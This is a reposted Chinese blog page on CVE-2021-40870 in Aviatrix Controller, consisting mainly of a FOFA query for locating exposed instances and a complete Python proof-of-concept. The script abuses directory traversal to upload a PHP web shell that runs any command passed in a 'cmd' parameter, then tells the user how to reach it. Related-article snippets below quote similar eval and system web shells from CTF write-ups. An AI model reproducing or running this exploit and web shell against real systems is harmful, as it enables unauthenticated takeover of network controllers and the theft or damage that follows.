新洞!CVE-2021-40870 Aviatrix-Controller 远程代码执行Getshell

最新推荐文章于 2023-07-16 13:10:17 发布
最新推荐文章于 2023-07-16 13:10:17 发布
阅读量1.2k 收藏 1
点赞数
分类专栏: 风洞网转载 文章标签: php python 安全漏洞 shell 网络安全
原文链接:https://www.bewindward.com/thread-49-1-1.html
版权

洞悉安全,风洞网,认准官方网站!
风洞网

FOFA语法:app="Aviatrix-Controller"
风洞网
CVE-2021-40870 漏洞利用

在 6.5-1804.1922 之前的 Aviatrix Controller 6.x 中发现了一个问题。可以不受限制地上传具有危险类型的文件,这允许未经身份验证的用户通过目录遍历执行任意代码。

POC

def poc_attack(url):
    try:
        url = url + "/"
 
        filename = "RCE.php"
        shell = '''<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>'''
        if url.startswith('https://'):
            k = url.replace("https://", "")
            if k.endswith("/"):
                p = k.replace("/", "")
 
        user = '''Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'''
 
        headers = {
            "Host": p,
            "User-Agent": user,
            "Connection": "close",
            "Content-Length": "109",
            "Content-Type": "application/x-www-form-urlencoded",
            "Accept-Encoding": "gzip",
        }
 
        body = f'CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{filename}&data=poc by agun{shell}'
 
        r = requests.post(url + '/v1/backend1', headers=headers, data=body, verify=False)
        check_file = requests.get(url + '/v1/' + filename, verify=False)
        if check_file.status_code == 200:
            print(f'EXPLOITED {url}')
            print('')
            print(f'Go To {url}/v1/{filename}')
            print('')
            print('access shell using RCE.php?cmd=[command]')
    except Exception as err:
        pass

原POC利用Github公布地址:https://github.com/0xAgun/CVE-2021-40870

关注风洞网微信公众号!

在这里插入图片描述

「已注销」
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行.md
04-23
CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行
CTFHUB——RCE之eval执行和文件包含漏洞
m0_46467017的博客
08-31 5234
代码解释:本关代码和第一关文件包含一样,通过strpos函数判断参数是否存在flag字符,存在就执行include函数。因为本关没有限制php://input伪协议,所以本关解法和上一关一样,这里就不再赘述了。代码解释:本关代码和之前php://input关卡一样,通过substr函数来判断file参数是否等于php://,如果等于就执行include函数。代码解释为如果存在cmd参数,那就用eval函数执行cmd参数中的代码,所以本关存在命令执行。连接成功后,其余步骤与上一关相同。...
CTFHub_技能树_Web之RCE——“eval执行”、“命令注入”
Ho1aAs‘s Blog
07-23 8956
文章目录一、eval执行二、命令注入完 –>CTFHub传送门<– 一、eval执行 <?php if (isset($_REQUEST['cmd'])) { eval($_REQUEST["cmd"]); } else { highlight_file(__FILE__); } ?> PHP代码显示,要求将命令赋值给cmd然后执行 先查看一下根目录文件 /?cmd=system("ls"); !切记最后的分号不可省略! 没有需要的文件 看看上一级的文件夹 /
CTFhub技能树_Web RCE
weixin_45897324的博客
10-11 1186
一、eval执行 1.分析: 打开网站显示如下代码: <?php if (isset($_REQUEST['cmd'])) { eval($_REQUEST["cmd"]); } else { highlight_file(__FILE__); } ?> 大体意思是:判断cmd是否被设置,若cmd被赋值,则执行如下语句,否则就继续显示以上代码。 eval($_REQUEST["cmd"]); 其中: eval():该函数可以把字符串作为PHP代码执行 $_REQUEST['
CTFHub 技能树-- RCE(详解)
m0_62879498的博客
02-20 5282
CTFHub – RCE RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统 eval执行文件 查看一开始的源代码: <?php if(isset($_REQUEST['cmd'])){ eval($_REQUEST['cmd']); } else{ highlight_file(__FILE__); } ?> php函数意思是: 是否由变量cmd 如果有,就执行eval($_REQUEST['cmd
Tomcat环境问题漏洞(如CVE-2021-33037)和隐藏版本信息
weixin_43790613的博客
08-25 3516
文章目录环境问题漏洞(如CVE-2021-33037)解决隐藏版本信息 环境问题漏洞(如CVE-2021-33037)解决 进入https://tomcat.apache.org/security.html,选择对应的Tomcat版本 进入后就可以根据漏洞编码如CVE-2021-33037搜索可查看到哪个版本的Tomcat解决了这个bug 隐藏版本信息 进入tomcat的lib目录找到catalina.jar文件 进入org/apache/catalina/util 编辑配置文件ServerInfo.p
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
laravel-CVE-2021-3129-EXP-main.zip 写shellexp
12-17
其中之一就是 CVE-2021-3129,这是一个关键的安全问题,可能导致远程代码执行(RCE)。 **CVE-2021-3129 漏洞概述** CVE-2021-3129,也被称作“Laravel 文件上传漏洞”,源于 Laravel 框架在处理文件上传时的不...
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
然而,2021 年底,Log4j 发现了一个严重的安全漏洞,被称为 CVE-2021-44228(也称为 Log4Shell),这使得攻击者可以通过在日志记录中注入恶意代码远程执行任意代码,从而对受影响的系统造成严重威胁。 此漏洞源于...
CVE-2021-26855:CVE-2021-26855 exp
03-08
CVE-2021-26855 CVE-2021-26855 ssrf简单利用golang练习 影响版本 Exchange Server 2013小于CU23 Exchange Server 2016小于CU18 Exchange Server 2019小于CU7 利用条件 该突破性常规的交换漏洞,此突破并没有一个可登录的用户身份,可以在未授权的情况下获取内部用户资源,配合CVE-2021-27065可以实现远程命令执行。 进攻触发必要条件 目标服务器存在漏洞 目标交换服务器必须为负载均衡服务器,即同时使用两台及以上服务器 目标邮箱地址,注意,该地址需要为域内邮件地址而非邮箱地址,同时存在差异 攻击者还必须标识内部Exchange服务器的完全限定域名(FQDN) 以上四项中,FQDN可以通过ntlm type2消息抓取;邮件地址可以直接枚举。 使用说明 这一突破利用,使用脚本语言如ruby
【CTFHub】RCE
qq_61109509的博客
02-22 599
eval执行 <?php if (isset($_REQUEST['cmd'])) { eval($_REQUEST["cmd"]); } else { highlight_file(__FILE__); } ?> 先查看下目录 /?cmd=system('ls'); 看来这一级啥都没有,那我们看看上一级文件夹 /?cmd=system('ls /'); 打开flag,注意打开的是下一级 /?cmd=system('cat /flag_30311..
CVE-2021-4034漏洞原理解析
Ays.Ie的博客
11-18 8918
本篇文章主要分析了CVE-2021-4034漏洞,同时介绍了相关知识点以及使用方法,漏洞复现在前渗透测试(七)中体现,记录自己学习过程。
Apache Log4j2(CVE-2021-44228) 高危安全漏洞介绍
m0_54899775的博客
12-13 2302
Apache Log4j2(CVE-2021-44228) 高危安全漏洞介绍 史诗级漏洞
vulnhub渗透日记04:Lampiao
最新发布
ericalezl的博客
07-16 453
时间:2023.7.16,靶机来自vulnhub,感谢您的查阅arp-scan netdiscover -i eth0 -r 192.168.58.1/24 nmap -sn 192.168.58.1/24 都是可以发现主机的 masscan扫描开放哪些端口 nmap针对开放的端口进一步探测 80端口没啥东西 进入1898 点击图片url有id值 尝试修改 访问audio.m4a是一段音频,说了句 user tiago qrc.png里面是个二维码,扫过没啥用 第三页,有个mp3,咋的还得听首歌呗! 听
Windows Print Spooler服务最新漏洞CVE-2021-34527详细分析
热门推荐
爱国小白帽
07-09 1万+
0x00 前言 近日,有安全研究员在github上公开了"CVE-2021-1675"的exp PrintNightmare,后经验证公开的exp是一个与CVE-2021-1675不同的漏洞,微软为其分配了新的编号CVE-2021-34527。这篇文章记录了CVE-2021-34527的复现过程,并对漏洞成因进行了简单的分析。 0x01 漏洞复现 这里记录域控环境下使用普通权限域账户实现RCE反弹nt authority\system shell的过程。下面的漏洞复现和漏洞分析都是基..
RCE高危漏洞预警:CVE-2021-40444简要分析
「鸿渐之翼」的博客
09-24 2108
漏洞影响及其危害:未经身份验证的攻击者可以利用该漏洞在目标系统上执行代码。 Microsoft发布了一份关于此漏洞的官方公告。 这篇博客文章讨论了该漏洞如何发挥作用.。 我们已获得多个利用此漏洞的文档样本。文档包中的document.xml.rels文件中都包含以下代码: 请大家主要,存在一个URL(我们已删除),该URL下载一个名为side.html的文件(SHA-256:D0FD7ACC38B3105FACD699534242F28E45F5380FDF2EC93EA24BFBC1DC9E6)。该文件
关于 CVE-2021-44228 Log4j2 漏洞的相关应对汇总说明(包含中英文客户公告)
Hsiao的二进制生活
12-14 837
Apache Log4j2是一款非常优秀的Java日志框架,它在各大交易所、钱包、DeFi项目中广泛使用。12月9日,Apache官方发布了紧急安全更新,修复了Apache Log4j2中发现的远程代码执行漏洞。 以下是漏洞详情: 漏洞详情:https://github.com/apache/logging-log4j2 Apache Log4j 远程代码执行漏洞 严重程度: 严重 由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。漏洞利用无需特殊配置,
PHP安全之webshell和后门检测
weixin_30517001的博客
05-06 557
一、各种webshell 一句话木马,其形式如下所示: <?php if(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST["cmd"]); system($cmd); echo"</pre>$cmd<pre>"; die; } ?> 这种容易被安全软件检...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值